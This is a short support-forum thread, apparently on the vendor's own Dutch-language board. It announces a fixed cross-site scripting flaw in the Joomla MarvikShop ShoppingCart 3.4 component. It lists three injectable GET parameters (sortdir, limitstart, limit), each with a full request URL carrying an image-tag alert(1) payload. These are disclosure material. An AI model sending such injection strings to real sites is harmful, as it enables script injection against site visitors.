- Berichten: 106
- Ontvangen bedankjes 10
Joomla MarvikShop ShoppingCart 3.4 Cross Site Scripting
- Support Team
- Onderwerp Auteur
- Offline
- Moderator
Minder
Meer
8 maanden 2 weken geleden #2173
door Support Team
This issue has been resolved in Version 4.0 and retroactively in 3.4. Have you found anything else? Please let us know.
Joomla MarvikShop ShoppingCart 3.4 Cross Site Scripting werd gestart door Support Team
Code:
Path: /en/index.php
GET parameter 'sortdir' is vulnerable to XSS
index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po<img src=a on-error=alert(1)>vh217
GET parameter 'limitstart' is vulnerable to XSS
index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0lmefx<img src=a on-error=alert(1)>fe7s7
GET parameter 'limit' is vulnerable to XSS
index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0&limit=25oj1c5<img src=a on-error=alert(1)>tquly
This issue has been resolved in Version 4.0 and retroactively in 3.4. Have you found anything else? Please let us know.
Graag Inloggen of een account aanmaken deelnemen aan het gesprek.